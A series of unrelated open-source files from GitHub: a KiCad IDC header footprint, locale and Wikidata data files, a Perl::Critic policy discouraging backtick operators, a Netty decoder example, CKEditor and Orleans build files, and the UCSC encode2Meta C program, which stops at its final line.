(fp_line (start 4.47 82.66) (end -1.93 82.66) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 82.66) (end -1.93 41.42) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 41.42) (end -1.93 41.42) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 41.42) (end -3.24 41.42) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 -12.83) (end -1.04 -20.58) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 -20.58) (end 3.58 -20.58) (layer F.SilkS) (width 0.12)) (fp_line (start 3.58 -20.58) (end 3.58 -12.83) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 91.57) (end -1.04 99.32) (layer F.SilkS) (width 0.12)) (fp_line (start -1.04 99.32) (end 3.58 99.32) (layer F.SilkS) (width 0.12)) (fp_line (start 3.58 99.32) (end 3.58 91.57) (layer F.SilkS) (width 0.12)) (fp_line (start -3.63 0) (end -4.63 -0.5) (layer F.SilkS) (width 0.12)) (fp_line (start -4.63 -0.5) (end -4.63 0.5) (layer F.SilkS) (width 0.12)) (fp_line (start -4.63 0.5) (end -3.63 0) (layer F.SilkS) (width 0.12)) (fp_line (start -3.63 -20.97) (end -3.63 99.71) (layer F.CrtYd) (width 0.05)) (fp_line (start -3.63 99.71) (end 6.17 99.71) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.17 99.71) (end 6.17 -20.97) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.17 -20.97) (end -3.63 -20.97) (layer F.CrtYd) (width 0.05)) (pad 1 thru_hole roundrect (at 0 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (roundrect_rratio 0.147059)) (pad 3 thru_hole circle (at 0 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 5 thru_hole circle (at 0 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 7 thru_hole circle (at 0 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 9 thru_hole circle (at 0 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 11 thru_hole circle (at 0 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 13 thru_hole circle (at 0 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 15 thru_hole circle (at 0 17.78) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 17 thru_hole circle (at 0 20.32) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 19 thru_hole circle (at 0 22.86) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 21 thru_hole circle (at 0 25.4) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 23 thru_hole circle (at 0 27.94) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 25 thru_hole circle (at 0 30.48) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 27 thru_hole circle (at 0 33.02) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 29 thru_hole circle (at 0 35.56) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 31 thru_hole circle (at 0 38.1) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 33 thru_hole circle (at 0 40.64) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 35 thru_hole circle (at 0 43.18) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 37 thru_hole circle (at 0 45.72) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 39 thru_hole circle (at 0 48.26) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 41 thru_hole circle (at 0 50.8) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 43 thru_hole circle (at 0 53.34) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 45 thru_hole circle (at 0 55.88) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 47 thru_hole circle (at 0 58.42) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 49 thru_hole circle (at 0 60.96) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 51 thru_hole circle (at 0 63.5) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 53 thru_hole circle (at 0 66.04) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 55 thru_hole circle (at 0 68.58) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 57 thru_hole circle (at 0 71.12) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 59 thru_hole circle (at 0 73.66) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 61 thru_hole circle (at 0 76.2) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 63 thru_hole circle (at 0 78.74) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 2 thru_hole circle (at 2.54 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 4 thru_hole circle (at 2.54 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 6 thru_hole circle (at 2.54 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 8 thru_hole circle (at 2.54 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 10 thru_hole circle (at 2.54 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 12 thru_hole circle (at 2.54 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 14 thru_hole circle (at 2.54 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 16 thru_hole circle (at 2.54 17.78) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 18 thru_hole circle (at 2.54 20.32) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 20 thru_hole circle (at 2.54 22.86) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 22 thru_hole circle (at 2.54 25.4) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 24 thru_hole circle (at 2.54 27.94) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 26 thru_hole circle (at 2.54 30.48) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 28 thru_hole circle (at 2.54 33.02) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 30 thru_hole circle (at 2.54 35.56) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 32 thru_hole circle (at 2.54 38.1) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 34 thru_hole circle (at 2.54 40.64) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 36 thru_hole circle (at 2.54 43.18) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 38 thru_hole circle (at 2.54 45.72) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 40 thru_hole circle (at 2.54 48.26) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 42 thru_hole circle (at 2.54 50.8) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 44 thru_hole circle (at 2.54 53.34) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 46 thru_hole circle (at 2.54 55.88) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 48 thru_hole circle (at 2.54 58.42) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 50 thru_hole circle (at 2.54 60.96) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 52 thru_hole circle (at 2.54 63.5) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 54 thru_hole circle (at 2.54 66.04) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 56 thru_hole circle (at 2.54 68.58) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 58 thru_hole circle (at 2.54 71.12) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 60 thru_hole circle (at 2.54 73.66) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 62 thru_hole circle (at 2.54 76.2) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 64 thru_hole circle (at 2.54 78.74) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad MP thru_hole circle (at 1.02 -8.94) (size 8 8) (drill 2.69) (layers *.Cu *.Mask)) (pad MP thru_hole circle (at 1.02 87.68) (size 8 8) (drill 2.69) (layers *.Cu *.Mask)) (fp_text user %R (at 1.27 39.37 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (model ${KISYS3DMOD}/Connector_IDC.3dshapes/IDC-Header_2x32-1MP_P2.54mm_Latch9.5mm_Vertical.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) )
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE ldml SYSTEM "../../common/dtd/ldml.dtd"> <ldml> <identity> <version number="$Revision: 5798 $"/> <generation date="$Date: 2011-05-02 15:05:34 +0900 (Mon, 02 May 2011) $"/> <language type="teo"/> <territory type="KE"/> </identity> <numbers> <currencies> <currency type="KES"> <symbol>Ksh</symbol> </currency> </currencies> </numbers> </ldml>
{ "pile_set_name": "Github" }
{ "exclude": { "self": [ { "id": "Q20081432", "name": "deputy of Bolivia" } ], "other": [ ] }, "include": { "self": [ { "id": "Q20081427", "name": "senator of Bolivia" } ], "other_legislatures": [ ], "executive": [ ], "party": [ ], "other": [ ] }, "unknown": { "unknown": [ ] } }
{ "pile_set_name": "Github" }
package Perl::Critic::Policy::InputOutput::ProhibitBacktickOperators; use 5.006001; use strict; use warnings; use Readonly; use Perl::Critic::Utils qw{ :severities is_in_void_context }; use base 'Perl::Critic::Policy'; our $VERSION = '1.139_01'; #----------------------------------------------------------------------------- Readonly::Scalar my $EXPL => q{Use IPC::Open3 instead}; Readonly::Scalar my $DESC => q{Backtick operator used}; Readonly::Scalar my $VOID_EXPL => q{Assign result to a variable or use system() instead}; Readonly::Scalar my $VOID_DESC => q{Backtick operator used in void context}; #----------------------------------------------------------------------------- sub supported_parameters { return ( { name => 'only_in_void_context', description => 'Allow backticks everywhere except in void contexts.', behavior => 'boolean', }, ); } sub default_severity { return $SEVERITY_MEDIUM } sub default_themes { return qw(core maintenance) } sub applies_to { return qw(PPI::Token::QuoteLike::Backtick PPI::Token::QuoteLike::Command ) } #----------------------------------------------------------------------------- sub violates { my ( $self, $elem, undef ) = @_; if ( $self->{_only_in_void_context} ) { return if not is_in_void_context( $elem ); return $self->violation( $VOID_DESC, $VOID_EXPL, $elem ); } return $self->violation( $DESC, $EXPL, $elem ); } 1; __END__ #----------------------------------------------------------------------------- =pod =for stopwords perlipc =head1 NAME Perl::Critic::Policy::InputOutput::ProhibitBacktickOperators - Discourage stuff like C<@files = `ls $directory`>. =head1 AFFILIATION This Policy is part of the core L<Perl::Critic|Perl::Critic> distribution. =head1 DESCRIPTION Backticks are super-convenient, especially for CGI programs, but I find that they make a lot of noise by filling up STDERR with messages when they fail. I think its better to use IPC::Open3 to trap all the output and let the application decide what to do with it. use IPC::Open3 'open3'; $SIG{CHLD} = 'IGNORE'; @output = `some_command`; #not ok my ($writer, $reader, $err); open3($writer, $reader, $err, 'some_command'); #ok; @output = <$reader>; #Output here @errors = <$err>; #Errors here, instead of the console =head1 CONFIGURATION Alternatively, if you do want to use backticks, you can restrict checks to void contexts by adding the following to your F<.perlcriticrc> file: [InputOutput::ProhibitBacktickOperators] only_in_void_context = 1 The purpose of backticks is to capture the output of an external command. Use of them in a void context is likely a bug. If the output isn't actually required, C<system()> should be used. Otherwise assign the result to a variable. `some_command`; #not ok $output = `some_command`; #ok @output = `some_command`; #ok =head1 NOTES This policy also prohibits the generalized form of backticks seen as C<qx{}>. See L<perlipc|perlipc> for more discussion on using C<wait()> instead of C<$SIG{CHLD} = 'IGNORE'>. You might consider using the C<capture()> function from the L<IPC::System::Simple|IPC::System::Simple> module for a safer way of doing what backticks do, especially on Windows. The module also has a safe wrapper around C<system()>. =head1 AUTHOR Jeffrey Ryan Thalhammer <[email protected]> =head1 COPYRIGHT Copyright (c) 2005-2011 Imaginative Software Systems. All rights reserved. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. The full text of this license can be found in the LICENSE file included with this module. =cut # Local Variables: # mode: cperl # cperl-indent-level: 4 # fill-column: 78 # indent-tabs-mode: nil # c-indentation-style: bsd # End: # ex: set ts=8 sts=4 sw=4 tw=78 ft=perl expandtab shiftround :
{ "pile_set_name": "Github" }
package nia.chapter10; import io.netty.buffer.ByteBuf; import io.netty.channel.ChannelHandlerContext; import io.netty.handler.codec.ReplayingDecoder; import java.util.List; /** * Listing 10.2 Class ToIntegerDecoder2 extends ReplayingDecoder * * @author <a href="mailto:[email protected]">Norman Maurer</a> */ public class ToIntegerDecoder2 extends ReplayingDecoder<Void> { @Override public void decode(ChannelHandlerContext ctx, ByteBuf in, List<Object> out) throws Exception { out.add(in.readInt()); } }
{ "pile_set_name": "Github" }
/* Localized versions of Info.plist keys */
{ "pile_set_name": "Github" }
/* Copyright (c) 2003-2015, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.md or http://ckeditor.com/license */ CKEDITOR.plugins.setLang( 'horizontalrule', 'sq', { toolbar: 'Vendos Vijë Horizontale' } );
{ "pile_set_name": "Github" }
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <PackageId>Microsoft.Orleans.Persistence.AzureStorage</PackageId> <Title>Microsoft Orleans Persistence Azure Storage</Title> <Description>Microsoft Orleans persistence providers for Azure Storage</Description> <PackageTags>$(PackageTags) Azure Table Blob Storage</PackageTags> <TargetFrameworks>$(StandardTargetFrameworks)</TargetFrameworks> </PropertyGroup> <PropertyGroup> <AssemblyName>Orleans.Persistence.AzureStorage</AssemblyName> <RootNamespace>Orleans.Persistence.AzureStorage</RootNamespace> <OrleansBuildTimeCodeGen>true</OrleansBuildTimeCodeGen> <DefineConstants>$(DefineConstants);ORLEANS_PERSISTENCE</DefineConstants> </PropertyGroup> <ItemGroup> <Compile Include="..\Shared\Storage\AzureBlobUtils.cs" Link="Storage\AzureBlobUtils.cs" /> <Compile Include="..\Shared\Storage\AzureStorageOperationOptions.cs" Link="Storage\AzureStorageOperationOptions.cs" /> <Compile Include="..\Shared\Storage\AzureStoragePolicyOptions.cs" Link="Storage\AzureStoragePolicyOptions.cs" /> <Compile Include="..\Shared\Storage\AzureTableDataManager.cs" Link="Storage\AzureTableDataManager.cs" /> <Compile Include="..\Shared\Storage\AzureTableUtils.cs" Link="Storage\AzureTableUtils.cs" /> <Compile Include="..\Shared\Utilities\ErrorCode.cs" Link="Utilities\ErrorCode.cs" /> </ItemGroup> <ItemGroup> <PackageReference Include="Microsoft.Azure.Cosmos.Table" Version="$(MicrosoftAzureCosmosTableVersion)" /> <PackageReference Include="Azure.Core" Version="$(AzureCoreVersion)" /> <PackageReference Include="Azure.Storage.Blobs" Version="$(AzureStorageBlobsVersion)" /> <PackageReference Include="System.Net.NameResolution" Version="$(SystemNetNameResolutionVersion)" /> </ItemGroup> </Project>
{ "pile_set_name": "Github" }
/* encode2Meta - Create meta files.. */ /* Copyright (C) 2013 The Regents of the University of California * See README in this or parent directory for licensing information. */ #include "common.h" #include "linefile.h" #include "hash.h" #include "options.h" #include "encode/encodeExp.h" #include "encode3/encode2Manifest.h" #include "mdb.h" char *metaDbs[] = {"hg19", "mm9"}; char *organisms[] = {"human", "mouse"}; char *metaTable = "metaDb"; char *expDb = "hgFixed"; char *expTable = "encodeExp"; /* Command line variables */ boolean withParent = FALSE; boolean maniFields = FALSE; void usage() /* Explain usage and exit. */ { errAbort( "encode2Meta - Create meta.txt file. This is a hierarchical .ra file with heirarchy defined\n" "by indentation. You might think of it as a meta tag tree. It contains the contents of\n" "the hg19 and mm9 metaDb tables and the hgFixed.encodeExp table.\n" "usage:\n" " encode2Meta database manifest.tab meta.txt\n" "options:\n" " -withParent - if set put a parent tag in each stanza in addition to indentation\n" " -maniFields - includes some fileds normally suppressed because they are also in manifest\n" ); } /* Command line validation table. */ static struct optionSpec options[] = { {"withParent", OPTION_BOOLEAN}, {"maniFields", OPTION_BOOLEAN}, {NULL, 0}, }; struct metaNode /* A node in a metadata tree */ { struct metaNode *next; /* Next sibling. */ struct metaNode *children; /* Children if any */ struct metaNode *parent; /* Parent if any */ char *name; /* Node's unique symbolic name. */ struct mdbVar *vars; /* Variables used if any */ }; char *mdbVarLookup(struct mdbVar *list, char *var) /* Return value associated with given var if var is on list, else NULL */ { struct mdbVar *v; for (v = list; v != NULL; v = v->next) { if (sameString(v->var, var)) return v->val; } return NULL; } char *metaLocalVal(struct metaNode *node, char *var) /* Look up value, not going up to parents. */ { return mdbVarLookup(node->vars, var); } char *metaVal(struct metaNode *node, char *var) /* Return value of given var, or none if variable isn't defined. * Looks first in self, and then in parents. */ { char *val; while (node != NULL) { if ((val = metaLocalVal(node, var)) != NULL) return val; node = node->parent; } return NULL; } struct mdbVar *mdbVarNew(char *var, char *val) /* Return a new mdbVar. */ { struct mdbVar *v; AllocVar(v); v->var = cloneString(var); v->val = cloneString(val); return v; } void metaNodeAddVar(struct metaNode *node, char *var, char *val) /* Add var to node - but only if it is not already present at same value at a higher level */ { if (val == NULL) return; if (node->parent != NULL && sameOk(metaVal(node->parent, var), val)) return; /* Already in parent, we are fine. */ if (metaLocalVal(node, var)) errAbort("Redefining %s.%s\n", node->name, var); struct mdbVar *v = mdbVarNew(var, val); slAddHead(&node->vars, v); } void metaNodeAddVarVals(struct metaNode *node, char *varVals) /* Add string of var=vals to node */ { if (varVals == NULL) return; struct slPair *pair, *pairList = slPairListFromString(varVals, FALSE); for (pair = pairList; pair != NULL; pair = pair->next) metaNodeAddVar(node, pair->name, pair->val); } struct metaNode *metaNodeNew(char *name) /* Make new but empty and unconnected node. */ { struct metaNode *meta; AllocVar(meta); meta->name = cloneString(name); return meta; } struct metaNode *metaTreeNew(char *name) /* Make largely empty root node. */ { return metaNodeNew(name); } struct mdbObj *getMdbList(char *database) /* Get list of metaDb objects for a database. */ { struct sqlConnection *conn = sqlConnect(database); struct mdbObj *list = mdbObjsQueryAll(conn, metaTable); sqlDisconnect(&conn); return list; } struct metaNode *wrapNodeAroundExp(struct encodeExp *exp) /* Wrap a metaNode around exp, and return it. */ { struct metaNode *node = metaNodeNew(exp->accession); metaNodeAddVar(node, "organism", exp->organism); metaNodeAddVar(node, "lab", exp->lab); metaNodeAddVar(node, "dataType", exp->dataType); metaNodeAddVar(node, "cellType", exp->cellType); metaNodeAddVar(node, "updateTime", exp->updateTime); metaNodeAddVarVals(node, exp->expVars); return node; } void metaTreeWrite(int level, int minLevel, int maxLevel, boolean isFile, char *parent, struct metaNode *node, struct hash *suppress, FILE *f) /* Write out self and children to file recursively. */ { if (level >= minLevel && level < maxLevel) { int indent = (level-minLevel)*3; spaceOut(f, indent); fprintf(f, "meta %s\n", node->name); if (withParent && parent != NULL) { spaceOut(f, indent); fprintf(f, "parent %s\n", parent); } struct mdbVar *v; for (v = node->vars; v != NULL; v = v->next) { if (!hashLookup(suppress, v->var)) { spaceOut(f, indent); fprintf(f, "%s %s\n", v->var, v->val); } } fprintf(f, "\n"); } struct metaNode *child; for (child = node->children; child != NULL; child = child->next) metaTreeWrite(level+1, minLevel, maxLevel, isFile, node->name, child, suppress, f); } boolean mdbVarRemove(struct mdbVar **pList, char *var) /* Find given variable in list and remove it. Returns TRUE if it * actually removed it, FALSE if it never found it. */ { struct mdbVar **ln = pList; struct mdbVar *v; for (v = *pList; v != NULL; v = v->next) { if (sameString(v->var, var)) { *ln = v->next; return TRUE; } ln = &v->next; } return FALSE; } void hoistOne(struct metaNode *node, char *var, char *val) /* We've already determined that var exists and has same value in all children. * What we do here is add it to ourselves and remove it from children. */ { if (mdbVarLookup(node->vars, var)) mdbVarRemove(&node->vars, var); metaNodeAddVar(node, var, val); struct metaNode *child; for (child = node->children; child != NULL; child = child->next) { mdbVarRemove(&child->vars, var); } } struct slName *varsInAnyNode(struct metaNode *nodeList) /* Return list of variables that are used in any node in list. */ { struct hash *varHash = hashNew(6); struct slName *var, *varList = NULL; struct metaNode *node; for (node = nodeList; node != NULL; node = node->next) { struct mdbVar *v; for (v = node->vars; v != NULL; v = v->next) { if (!hashLookup(varHash, v->var)) { var = slNameAddHead(&varList, v->var); hashAdd(varHash, var->name, var); } } } hashFree(&varHash); return varList; } char *allSameVal(char *var, struct metaNode *nodeList) /* Return value of variable if it exists and is the same in each node on list */ { char *val = NULL; struct metaNode *node; for (node = nodeList; node != NULL; node = node->next) { char *oneVal = mdbVarLookup(node->vars, var); if (oneVal == NULL) return NULL; if (val == NULL) val = oneVal; else { if (!sameString(oneVal, val)) return NULL; } } return val; } char *allSameValWithDataMostWithData(char *var, struct metaNode *nodeList, double minProportion) /* Return variable if all nodes that have it have it set to same value, and * most (at least minProportion) have it. */ { char *val = NULL; struct metaNode *node; int nodeCount = 0, dataCount = 0; for (node = nodeList; node != NULL; node = node->next) { ++nodeCount; char *oneVal = mdbVarLookup(node->vars, var); if (oneVal != NULL) { ++dataCount; if (val == NULL) val = oneVal; else { if (!sameString(oneVal, val)) return NULL; } } } int minDataNeeded = round(nodeCount * minProportion); if (dataCount < minDataNeeded) return NULL; return val; } void metaTreeHoist(struct metaNode *node, struct hash *closeEnoughTags) /* Move variables that are the same in all children up to parent. */ { /* Do depth first recursion, but get early return if we're a leaf. */ struct metaNode *child; if (node->children == NULL) return; for (child = node->children; child != NULL; child = child->next) metaTreeHoist(child, closeEnoughTags); /* Build up list of variables used in any child. */ struct slName *var, *varList = varsInAnyNode(node->children); /* Go through list and figure out ones that are same in all children. */ for (var = varList; var != NULL; var = var->next) { char *val; double *closeEnough = hashFindVal(closeEnoughTags, var->name); if (closeEnough) val = allSameValWithDataMostWithData(var->name, node->children, *closeEnough); else val = allSameVal(var->name, node->children); if (val != NULL) { if (!sameString(var->name, "fileName")) hoistOne(node, var->name, val); } } } double *cloneDouble(double x) /* Return clone of double in dynamic memory */ { return CloneVar(&x); } struct hash *makeCloseEnoughTags() /* Make double pointer valued hash keyed by tags that only need to be * present in most children to be hoisted. */ { struct hash *closeEnoughTags = hashNew(5); hashAdd(closeEnoughTags, "organism", cloneDouble(0.8)); hashAdd(closeEnoughTags, "lab", cloneDouble(0.8)); hashAdd(closeEnoughTags, "age", cloneDouble(0.8)); hashAdd(closeEnoughTags, "grant", cloneDouble(0.8)); hashAdd(closeEnoughTags, "dateSubmitted", cloneDouble(0.8)); hashAdd(closeEnoughTags, "dateUnrestricted", cloneDouble(0.8)); hashAdd(closeEnoughTags, "softwareVersion", cloneDouble(0.8)); hashAdd(closeEnoughTags, "control", cloneDouble(0.9)); hashAdd(closeEnoughTags, "geoSampleAccession", cloneDouble(0.7)); return closeEnoughTags; } struct hash *makeSuppress() /* Make a hash full of fields to suppress. */ { struct hash *suppress = hashNew(4); hashAdd(suppress, "objType", NULL); // Inherent in hierarchy or ignored hashAdd(suppress, "subId", NULL); // Submission ID not worth carrying forward hashAdd(suppress, "tableName", NULL); // We aren't interested in tables, just files hashAdd(suppress, "project", NULL); // Always wgEncode hashAdd(suppress, "expId", NULL); // Redundant with dccAccession hashAdd(suppress, "cell", NULL); // Completely redundant with cellType - I checked hashAdd(suppress, "sex", NULL); // This should be implied in cellType if (!maniFields) { hashAdd(suppress, "dccAccession", NULL); // Redundant with meta object name hashAdd(suppress, "composite", NULL); // Inherent in hierarchy now hashAdd(suppress, "view", NULL); // This is in maniest hashAdd(suppress, "replicate", NULL); // This is in manifest hashAdd(suppress, "md5sum", NULL); // Also in manifest } return suppress; } boolean originalData(char *symbol) /* Return TRUE if it's not just a repackaging. */ { return (symbol != NULL && !startsWith("wgEncodeAwg", symbol) && !startsWith("wgEncodeReg", symbol)); } int metaNodeCmp(const void *va, const void *vb) // Compare metaNode to sort on var name, case-insensitive. { const struct metaNode *a = *((struct metaNode **)va); const struct metaNode *b = *((struct metaNode **)vb); return strcasecmp(a->name, b->name); } void metaTreeSortChildrenSortTags(struct metaNode *node) /* Reverse child list recursively and sort tags list. */ { slSort(&node->vars, mdbVarCmp); slSort(&node->children, metaNodeCmp); struct metaNode *child; for (child = node->children; child !=NULL; child = child->next) metaTreeSortChildrenSortTags(child); } void encode2Meta(char *database, char *manifestIn, char *outMetaRa) /* encode2Meta - Create meta files.. */ { int dbIx = stringArrayIx(database, metaDbs, ArraySize(metaDbs)); if (dbIx < 0) errAbort("Unrecognized database %s", database); /* Create a three level meta.ra format file based on hgFixed.encodeExp * and database.metaDb tables. The levels are composite, experiment, file */ struct metaNode *metaTree = metaTreeNew("encode2"); /* Load up the manifest. */ struct encode2Manifest *mi, *miList = encode2ManifestShortLoadAll(manifestIn); struct hash *miHash = hashNew(18); for (mi = miList; mi != NULL; mi = mi->next) hashAdd(miHash, mi->fileName, mi); verbose(1, "%d files in %s\n", miHash->elCount, manifestIn); /* Load up encodeExp info. */ struct sqlConnection *expConn = sqlConnect(expDb); struct encodeExp *expList = encodeExpLoadByQuery(expConn, "NOSQLINJ select * from encodeExp"); sqlDisconnect(&expConn); verbose(1, "%d experiments in encodeExp\n", slCount(expList)); struct hash *compositeHash = hashNew(0); /* Go through each organism database in turn. */ int i; for (i=0; i<ArraySize(metaDbs); ++i) { char *db = metaDbs[i]; if (!sameString(database, db)) continue; verbose(1, "exploring %s\n", db); struct mdbObj *mdb, *mdbList = getMdbList(db); verbose(1, "%d meta objects in %s\n", slCount(mdbList), db); /* Get info on all composites. */ for (mdb = mdbList; mdb != NULL; mdb = mdb->next) { char *objType = mdbVarLookup(mdb->vars, "objType"); if (objType != NULL && sameString(objType, "composite")) { char compositeName[256]; safef(compositeName, sizeof(compositeName), "%s", mdb->obj); struct metaNode *compositeNode = metaNodeNew(compositeName); slAddHead(&metaTree->children, compositeNode); compositeNode->parent = metaTree; struct mdbVar *v; for (v=mdb->vars; v != NULL; v = v->next) { metaNodeAddVar(compositeNode, v->var, v->val); } metaNodeAddVar(compositeNode, "assembly", db); hashAdd(compositeHash, mdb->obj, compositeNode); } } /* Make up one more for experiments with no composite. */ char *noCompositeName = "wgEncodeZz"; struct metaNode *noCompositeNode = metaNodeNew(noCompositeName); slAddHead(&metaTree->children, noCompositeNode); noCompositeNode->parent = metaTree; hashAdd(compositeHash, noCompositeName, noCompositeNode); /* Now go through objects trying to tie experiments to composites. */ struct hash *expToComposite = hashNew(16); for (mdb = mdbList; mdb != NULL; mdb = mdb->next) { char *composite = mdbVarLookup(mdb->vars, "composite"); if (originalData(composite)) { char *dccAccession = mdbVarLookup(mdb->vars, "dccAccession"); if (dccAccession != NULL) { char *oldComposite = hashFindVal(expToComposite, dccAccession); if (oldComposite != NULL) { if (!sameString(oldComposite, composite)) verbose(2, "%s maps to %s ignoring mapping to %s", dccAccession, oldComposite, composite); } else { hashAdd(expToComposite, dccAccession, composite); } } } } /* Now get info on all experiments in this organism. */ struct hash *expHash = hashNew(0); struct encodeExp *exp; for (exp = expList; exp != NULL; exp = exp->next) { if (sameString(exp->organism, organisms[i])) { if (exp->accession != NULL) { char *composite = hashFindVal(expToComposite, exp->accession); struct metaNode *compositeNode; if (composite != NULL) { compositeNode = hashMustFindVal(compositeHash, composite); } else { compositeNode = noCompositeNode; } struct metaNode *expNode = wrapNodeAroundExp(exp); hashAdd(expHash, expNode->name, expNode); slAddHead(&compositeNode->children, expNode); expNode->parent = compositeNode; } } } for (mdb = mdbList; mdb != NULL; mdb = mdb->next) { char *fileName = NULL, *dccAccession = NULL; char *objType = mdbVarLookup(mdb->vars, "objType"); if (objType != NULL && sameString(objType, "composite")) continue; dccAccession = mdbVarLookup(mdb->vars, "dccAccession"); if (dccAccession == NULL) continue; char *composite = hashFindVal(expToComposite, dccAccession); if (composite == NULL) errAbort("Can't find composite for %s", mdb->obj); struct mdbVar *v; for (v = mdb->vars; v != NULL; v = v->next) { char *var = v->var, *val = v->val; if (sameString("fileName", var)) { fileName = val; char path[PATH_LEN]; char *comma = strchr(fileName, ','); if (comma != NULL) *comma = 0; /* Cut off comma separated list. */ safef(path, sizeof(path), "%s/%s/%s", db, composite, fileName); /* Add database path */ fileName = val = v->val = cloneString(path); } } if (fileName != NULL) { if (hashLookup(miHash, fileName)) { struct metaNode *expNode = hashFindVal(expHash, dccAccession); if (expNode != NULL) { struct metaNode *fileNode = metaNodeNew(mdb->obj); slAddHead(&expNode->children, fileNode); fileNode->parent = expNode; struct mdbVar *v; for (v=mdb->vars; v != NULL; v = v->next) { metaNodeAddVar(fileNode, v->var, v->val); } } } } } #ifdef SOON #endif /* SOON */ } struct hash *suppress = makeSuppress(); struct hash *closeEnoughTags = makeCloseEnoughTags(); metaTreeHoist(metaTree, closeEnoughTags); metaTreeSortChildrenSortTags(metaTree); FILE *f = mustOpen(outMetaRa, "w"); struct metaNode *node; for (node = metaTree->children; node != NULL; node = node->next) metaTreeWrite(0, 0, BIGNUM, FALSE, NULL, node, suppress, f); carefulClose(&f); /* Write warning about tags in highest parent. */ struct mdbVar *v; for (v = metaTree->vars; v != NULL; v = v->next) verbose(1, "Omitting universal %s %s\n", v->var, v->val); } int main(int argc, char *argv[]) /* Process command line. */ { optionInit(&argc, argv, options); if (argc != 4) usage(); withParent = optionExists("withParent"); maniFields = optionExists("maniFields"); encode2Meta(argv[1], argv[2], argv[3]); return 